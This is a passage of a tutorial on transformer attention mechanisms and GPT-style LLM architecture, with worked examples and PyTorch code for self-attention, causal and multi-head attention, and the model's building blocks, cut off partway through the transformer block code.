pos_embeddings = pos_embedding_layer(torch.arange(max_length))

input_embeddings = token_embeddings + pos_embeddings
print(input_embeddings.shape) # torch.Size([8, 4, 256])
```

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

# 4. Attention Mechanisms

## Attention Mechanisms and Self-Attention in Neural Networks

Attention mechanisms allow neural networks to **focus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for an accurate translation.

> [!TIP]
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.

### Understanding Attention Mechanisms

In traditional sequence-to-sequence models, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all the necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.

#### Example: Machine Translation

Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between the languages. An attention mechanism enables the model to focus on the relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.

### Introduction to Self-Attention

Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.

#### Key Concepts

- **Tokens**: Individual elements of the input sequence (e.g., words in a sentence).
- **Embeddings**: Vector representations of tokens, capturing semantic information.
- **Attention Weights**: Values that determine the importance of each token relative to the others.

### Calculating Attention Weights: A Step-by-Step Example

Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:

- **Hello**: `[0.34, 0.22, 0.54]`
- **shiny**: `[0.53, 0.34, 0.98]`
- **sun**: `[0.29, 0.54, 0.93]`

Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.

#### Step 1: Compute Attention Scores

> [!TIP]
> Just multiply each dimension value of the query with the corresponding one of each token and add the results. You get 1 value per pair of tokens.

For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.

**Attention Score between "Hello" and "shiny"**

<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>

**Attention Score between "shiny" and "shiny"**

<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>

**Attention Score between "sun" and "shiny"**

<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>

#### Step 2: Normalize Attention Scores to Obtain Attention Weights

> [!TIP]
> Don't get lost in the mathematical terms, the goal of this function is simple: normalize all the weights so **they sum 1 in total**.
>
> Moreover, the **softmax** function is used because it accentuates differences due to the exponential part, making it easier to detect useful values.

Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.

<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>

Calculating the exponentials:

<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>

Calculating the sum:

<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>

Calculating the attention weights:

<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>

#### Step 3: Compute the Context Vector

> [!TIP]
> Just take each attention weight, multiply it by the dimensions of the related token and then sum all the dimensions to get just 1 vector (the context vector).

The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.

<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>

Calculating each component:

- **Weighted Embedding of "Hello"**:

<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>

- **Weighted Embedding of "shiny"**:

<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>

- **Weighted Embedding of "sun"**:

<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>

Summing the weighted embeddings:

`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`

**This context vector represents the enriched embedding for the word "shiny", incorporating information from all the words in the sentence.**

### Summary of the Process

1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all the words in the sequence.
2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
3. **Compute the Context Vector**: Multiply each word's embedding by its attention weight and sum the results (see the runnable sketch below).
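
The whole three-step computation fits in a few lines of PyTorch (a minimal sketch assuming the toy embeddings above):
```python
import torch

# Toy 3-dimensional embeddings for "Hello shiny sun!"
embeddings = torch.tensor([
    [0.34, 0.22, 0.54],  # Hello
    [0.53, 0.34, 0.98],  # shiny
    [0.29, 0.54, 0.93],  # sun
])

query = embeddings[1]  # "shiny" is the query token

# Step 1: dot-product attention scores between the query and every token
scores = embeddings @ query

# Step 2: softmax normalization so the weights sum to 1
weights = torch.softmax(scores, dim=0)

# Step 3: context vector = weighted sum of all token embeddings
context = weights @ embeddings
print(context)  # ≈ tensor([0.3992, 0.3858, 0.8610])
```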

## Self-Attention with Trainable Weights

In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys and values. This involves introducing three weight matrices:

<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>

The query is the data to use like before, while the key and value matrices are just random trainable matrices.

#### Step 1: Compute Queries, Keys, and Values

Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:

<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>

These matrices transform the original embeddings into a new space suitable for computing attention.

**Example**

Assuming:

- Input dimension `din=3` (embedding size)
- Output dimension `dout=2` (desired dimension for queries, keys and values)

Initialize the weight matrices:
```python
import torch.nn as nn

d_in = 3
d_out = 2

W_query = nn.Parameter(torch.rand(d_in, d_out))
W_key = nn.Parameter(torch.rand(d_in, d_out))
W_value = nn.Parameter(torch.rand(d_in, d_out))
```
Compute queries, keys, and values:
```python
queries = torch.matmul(inputs, W_query)
keys = torch.matmul(inputs, W_key)
values = torch.matmul(inputs, W_value)
```
#### Step 2: Compute Scaled Dot-Product Attention

**Compute Attention Scores**

Similar to the example from before, but this time, instead of using the values of the dimensions of the tokens, we use the key matrix of each token (already calculated from those dimensions). So, for each query `qi` and key `kj`:

<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>

**Scale the Scores**

To prevent the dot products from becoming too large, scale them by the square root of the key dimension `dk`:

<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>

> [!TIP]
> The score is divided by the square root of the dimensions because dot products might become very large and this helps to regulate them.

**Apply Softmax to Obtain Attention Weights:** Like in the initial example, normalize all the values so they sum 1.

<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>

#### Step 3: Compute Context Vectors

Like in the initial example, just sum all the value matrices, multiplying each one by its attention weight:

<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>

### Code Example

Grabbing an example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb), you can check this class implementing the self-attention functionality we discussed:
```python
import torch

inputs = torch.tensor(
    [[0.43, 0.15, 0.89],  # Your     (x^1)
     [0.55, 0.87, 0.66],  # journey  (x^2)
     [0.57, 0.85, 0.64],  # starts   (x^3)
     [0.22, 0.58, 0.33],  # with     (x^4)
     [0.77, 0.25, 0.10],  # one      (x^5)
     [0.05, 0.80, 0.55]]  # step     (x^6)
)

import torch.nn as nn
class SelfAttention_v2(nn.Module):

    def __init__(self, d_in, d_out, qkv_bias=False):
        super().__init__()
        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)

    def forward(self, x):
        keys = self.W_key(x)
        queries = self.W_query(x)
        values = self.W_value(x)

        attn_scores = queries @ keys.T
        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)

        context_vec = attn_weights @ values
        return context_vec

d_in = 3
d_out = 2
torch.manual_seed(789)
sa_v2 = SelfAttention_v2(d_in, d_out)
print(sa_v2(inputs))
```
> [!NOTE]
> Note that instead of initializing the matrices with random values, `nn.Linear` is used to mark all the weights as parameters to train.

## Causal Attention: Hiding Future Words

For LLMs we want the model to consider only the tokens that appear before the current position in order to **predict the next token**. **Causal attention**, also known as **masked attention**, achieves this by modifying the attention mechanism to prevent access to future tokens.

### Applying a Causal Attention Mask

To implement causal attention, we apply a mask to the attention scores **before the softmax operation** so the remaining ones still sum to 1. This mask sets the attention scores of future tokens to negative infinity, ensuring that after the softmax their attention weights are zero.

**Steps**

1. **Compute Attention Scores**: Same as before.
2. **Apply the Mask**: Use a boolean upper-triangular mask and fill the positions above the diagonal with negative infinity.

```python
mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)
masked_scores = attention_scores.masked_fill(mask, float('-inf'))
```

3. **Apply Softmax**: Compute the attention weights using the masked scores.

```python
attention_weights = torch.softmax(masked_scores, dim=-1)
```

### Masking Additional Attention Weights with Dropout

To **prevent overfitting**, we can apply **dropout** to the attention weights after the softmax operation. Dropout **randomly zeroes some of the attention weights** during training.
```python
dropout = nn.Dropout(p=0.5)
attention_weights = dropout(attention_weights)
```
A regular dropout rate is about 10-20%.

### Code Example

Code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
```python
import torch
import torch.nn as nn

inputs = torch.tensor(
    [[0.43, 0.15, 0.89],  # Your     (x^1)
     [0.55, 0.87, 0.66],  # journey  (x^2)
     [0.57, 0.85, 0.64],  # starts   (x^3)
     [0.22, 0.58, 0.33],  # with     (x^4)
     [0.77, 0.25, 0.10],  # one      (x^5)
     [0.05, 0.80, 0.55]]  # step     (x^6)
)

batch = torch.stack((inputs, inputs), dim=0)
print(batch.shape)

class CausalAttention(nn.Module):

    def __init__(self, d_in, d_out, context_length,
                 dropout, qkv_bias=False):
        super().__init__()
        self.d_out = d_out
        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))  # New

    def forward(self, x):
        b, num_tokens, d_in = x.shape
        # b is the num of batches
        # num_tokens is the number of tokens per batch
        # d_in is the dimensions per token

        keys = self.W_key(x)  # This generates the keys of the tokens
        queries = self.W_query(x)
        values = self.W_value(x)

        attn_scores = queries @ keys.transpose(1, 2)  # Swaps the second and third dimensions to be able to multiply
        attn_scores.masked_fill_(  # New, _ ops are in-place
            self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
        attn_weights = torch.softmax(
            attn_scores / keys.shape[-1]**0.5, dim=-1
        )
        attn_weights = self.dropout(attn_weights)

        context_vec = attn_weights @ values
        return context_vec

torch.manual_seed(123)

context_length = batch.shape[1]
d_in = 3
d_out = 2
ca = CausalAttention(d_in, d_out, context_length, 0.0)

context_vecs = ca(batch)

print(context_vecs)
print("context_vecs.shape:", context_vecs.shape)
```
## Extending Single-Head Attention to Multi-Head Attention

**Multi-head attention** in practical terms consists of executing **multiple instances** of the self-attention function, each of them with **their own weights**, so different final vectors are calculated.

### Code Example

It could be possible to reuse the previous code and just add a wrapper that launches it several times, but this is a more optimised version from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) that processes all the heads at the same time (reducing the number of expensive for loops). As you can see in the code, the dimensions of each token are divided among the heads. This way, if each token has 8 dimensions and we want to use 2 heads, the dimensions will be divided into 2 arrays of 4 dimensions and each head will use one of them:
```python
class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert (d_out % num_heads == 0), \
            "d_out must be divisible by num_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer(
            "mask",
            torch.triu(torch.ones(context_length, context_length),
                       diagonal=1)
        )

    def forward(self, x):
        b, num_tokens, d_in = x.shape
        # b is the num of batches
        # num_tokens is the number of tokens per batch
        # d_in is the dimensions per token

        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec)  # optional projection

        return context_vec

torch.manual_seed(123)

batch_size, context_length, d_in = batch.shape
d_out = 2
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)

context_vecs = mha(batch)

print(context_vecs)
print("context_vecs.shape:", context_vecs.shape)
```
For another compact and efficient implementation you could use the [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) class in PyTorch.
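
For instance, a minimal sketch of a causal self-attention call with that class might look as follows (the shapes and hyperparameters here are illustrative assumptions, not values from the book):
```python
import torch
import torch.nn as nn

embed_dim, num_heads, seq_len, batch_size = 8, 2, 6, 2
mha = nn.MultiheadAttention(embed_dim, num_heads, batch_first=True)

x = torch.randn(batch_size, seq_len, embed_dim)

# Boolean causal mask: True marks positions that must NOT be attended to
causal_mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)

# Self-attention: the same tensor is used as query, key and value
out, attn_weights = mha(x, x, x, attn_mask=causal_mask)
print(out.shape)  # torch.Size([2, 6, 8])
```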

> [!TIP]
> Short answer of ChatGPT about why it's better to divide the dimensions of the tokens among the heads instead of having each head check all the dimensions of all the tokens:
>
> While allowing each head to process all embedding dimensions might seem advantageous because each head would have access to the full information, the standard practice is to **divide the embedding dimensions among the heads**. This approach balances computational efficiency with model performance and encourages each head to learn diverse representations. Therefore, splitting the embedding dimensions is generally preferred over having each head check all dimensions.

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

# 5. LLM Architecture

## LLM Architecture

> [!TIP]
> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or to transform text to IDs and backwards.
>
> This architecture will be used for both training the model and predicting text after it was trained.

Example of an LLM architecture from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):

A high-level representation can be observed in:

<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>

1. **Input (Tokenized Text)**: The process begins with tokenized text, which is converted into numerical representations.
2. **Token Embedding and Positional Embedding Layer**: The tokenized text is passed through a **token embedding** layer and a **positional embedding layer**, which captures the position of tokens in the sequence, critical for understanding word order.
3. **Transformer Blocks**: The model contains **12 transformer blocks**, each with multiple layers. These blocks repeat the following sequence:
   - **Masked Multi-Head Attention**: Allows the model to focus on different parts of the input text at the same time.
   - **Layer Normalization**: A normalization step to stabilize and improve training.
   - **Feed Forward Layer**: Responsible for processing the information from the attention layers and making predictions about the next token.
   - **Dropout Layers**: These layers prevent overfitting by randomly dropping units during training.
4. **Final Output Layer**: The model outputs a **4x50,257-dimensional tensor**, where **50,257** represents the size of the vocabulary. Each row in this tensor corresponds to a vector that the model uses to predict the next word in the sequence.
5. **Goal**: The objective is to take these embeddings and convert them back into text. Specifically, the last row of the output is used to generate the next word, represented as "forward" in this diagram.

### Code representation
```python
import torch
import torch.nn as nn
import tiktoken

class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))

class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        return self.layers(x)

class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert d_out % num_heads == 0, "d_out must be divisible by num_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))

    def forward(self, x):
        b, num_tokens, d_in = x.shape

        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec)  # optional projection

        return context_vec

class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift

class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"])
        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
        # Shortcut connection for attention block
        shortcut = x
        x = self.norm1(x)
        x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        # Shortcut connection for feed forward block
        shortcut = x
        x = self.norm2(x)
        x = self.ff(x)
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        return x


class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(
            cfg["emb_dim"], cfg["vocab_size"], bias=False
        )

    def forward(self, in_idx):
        batch_size, seq_len = in_idx.shape
        tok_embeds = self.tok_emb(in_idx)
        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_emb(x)
        x = self.trf_blocks(x)
        x = self.final_norm(x)
        logits = self.out_head(x)
        return logits

GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-Key-Value bias
}

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
out = model(batch)  # `batch` is the tokenized input from the previous sections
print("Input batch:\n", batch)
print("\nOutput shape:", out.shape)
print(out)
```
### **GELU Activation Function**
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))
```
#### **Purpose and Functionality**

- **GELU (Gaussian Error Linear Unit):** An activation function that introduces non-linearity into the model.
- **Smooth Activation:** Unlike ReLU, which zeroes out negative inputs, GELU smoothly maps inputs to outputs, allowing small, non-zero values for negative inputs.
- **Mathematical Definition:**

<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

> [!NOTE]
> The goal of using this function after the linear layers inside the FeedForward layer is to change the linear data to be non-linear, allowing the model to learn complex, non-linear relationships.
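
To see the "smooth" behaviour in practice, here is a minimal sketch comparing GELU and ReLU on a few sample points (using PyTorch's built-in functional versions; the tanh approximation matches the formula above):
```python
import torch
import torch.nn.functional as F

x = torch.linspace(-3, 3, 7)
print(F.gelu(x, approximate='tanh'))  # small non-zero outputs for negative inputs
print(F.relu(x))                      # hard zero for every negative input
```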

### **FeedForward Neural Network**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        # x shape: (batch_size, seq_len, emb_dim)

        x = self.layers[0](x)  # x shape: (batch_size, seq_len, 4 * emb_dim)
        x = self.layers[1](x)  # x shape remains: (batch_size, seq_len, 4 * emb_dim)
        x = self.layers[2](x)  # x shape: (batch_size, seq_len, emb_dim)
        return x  # Output shape: (batch_size, seq_len, emb_dim)
```
#### **Purpose and Functionality**

- **Position-wise FeedForward Network:** Applies a two-layer fully connected network to each position separately and identically.
- **Layer Details:**
  - **First Linear Layer:** Expands the dimensionality from `emb_dim` to `4 * emb_dim`.
  - **GELU Activation:** Applies non-linearity.
  - **Second Linear Layer:** Reduces the dimensionality back to `emb_dim`.

> [!NOTE]
> As you can see, the FeedForward network uses 3 layers. The first one is a linear layer that will multiply the dimensions by 4 using linear weights (parameters to train inside the model). Then, the GELU function is used in all those dimensions to apply non-linear variations to capture richer representations, and finally another linear layer is used to get back to the original size of dimensions.

### **Multi-Head Attention Mechanism**

This was already explained in an earlier section.

#### **Purpose and Functionality**

- **Multi-Head Self-Attention:** Allows the model to focus on different positions within the input sequence when encoding a token.
- **Key Components:**
  - **Queries, Keys, Values:** Linear projections of the input, used to compute attention scores.
  - **Heads:** Multiple attention mechanisms running in parallel (`num_heads`), each with a reduced dimension (`head_dim`).
  - **Attention Scores:** Computed as the dot product of queries and keys, scaled and masked.
  - **Masking:** A causal mask is applied to prevent the model from attending to future tokens (important for autoregressive models like GPT).
  - **Attention Weights:** Softmax of the masked and scaled attention scores.
  - **Context Vector:** Weighted sum of the values, according to the attention weights.
  - **Output Projection:** Linear layer to combine the outputs of all heads.

> [!NOTE]
> The goal of this network is to find the relations between tokens in the same context. Moreover, the tokens are divided among different heads in order to prevent overfitting, although the final relations found per head are combined at the end of this network.
>
> Moreover, during training a **causal mask** is applied so later tokens are not taken into account when looking for the specific relations to a token, and some **dropout** is also applied to **prevent overfitting**.

### **Layer Normalization**
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5  # Prevent division by zero during normalization.
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift
```
#### **Purpose and Functionality**

- **Layer Normalization:** A technique used to normalize the inputs across the features (embedding dimensions) of each individual example in a batch.
- **Components:**
  - **`eps`:** A small constant (`1e-5`) added to the variance to prevent division by zero during normalization.
  - **`scale` and `shift`:** Learnable parameters (`nn.Parameter`) that allow the model to scale and shift the normalized output. They are initialized to ones and zeros, respectively.
- **Normalization Process:**
  - **Compute Mean (`mean`):** Calculates the mean of the input `x` across the embedding dimension (`dim=-1`), keeping the dimension for broadcasting (`keepdim=True`).
  - **Compute Variance (`var`):** Calculates the variance of `x` across the embedding dimension, also keeping the dimension. The `unbiased=False` parameter ensures the variance is calculated using the biased estimator (dividing by `N` instead of `N-1`), which is appropriate when normalizing over features rather than samples.
  - **Normalize (`norm_x`):** Subtracts the mean from `x` and divides by the square root of the variance plus `eps`.
  - **Scale and Shift:** Applies the learnable `scale` and `shift` parameters to the normalized output.

> [!NOTE]
> The goal is to ensure a mean of 0 with a variance of 1 across all dimensions of the same token. The purpose of this is to **stabilize the training of deep neural networks** by reducing the internal covariate shift, which refers to the change in the distribution of network activations due to the updating of parameters during training.
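
A quick sanity check (a sketch assuming the `LayerNorm` class defined above) confirms that every token vector ends up with mean ≈ 0 and variance ≈ 1:
```python
torch.manual_seed(123)
ln = LayerNorm(emb_dim=5)
x = torch.randn(2, 3, 5)  # (batch_size, seq_len, emb_dim)
out = ln(x)
print(out.mean(dim=-1))                 # ≈ 0 for every token
print(out.var(dim=-1, unbiased=False))  # ≈ 1 for every token
```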

### **Transformer Block**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04

class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"]
        )
